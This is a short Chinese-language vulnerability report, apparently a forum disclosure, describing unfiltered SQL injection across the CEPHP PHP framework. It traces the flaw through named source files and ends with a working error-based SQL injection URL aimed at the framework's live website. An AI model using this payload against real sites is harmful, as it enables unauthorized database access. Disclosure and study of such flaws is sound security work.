某轻量级php框架全站注入

百度搜索轻量级php框架 ，第一个就是这CEPHP，手贱测试下居然存在注入，下载源码居然发现全站涉及数据库操作的全部存在注入，对变量完全没有任何过滤。无语。截图看下：

1、主要文件demo\M\User\student.php

处理是参数没过滤带入Mdb->find函数进行处理，可以看到Mdb，继承自M_User_Student 最终会定位到Cemvc\Db\MysqlDb.php文件，该函数如下：

数据库查询语句也没有任何处理。。。注入产生 

http://www.cephp.com/search/1'%20AND%20(SELECT%207552%20FROM(SELECT%20COUNT(*),
CONCAT(0x3a666f613a,(SELECT%20(CASE%20WHEN%20(7552=7552)%20THEN%201%20ELSE%200%20END)),
0x3a71777a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'PUWw'='PUWw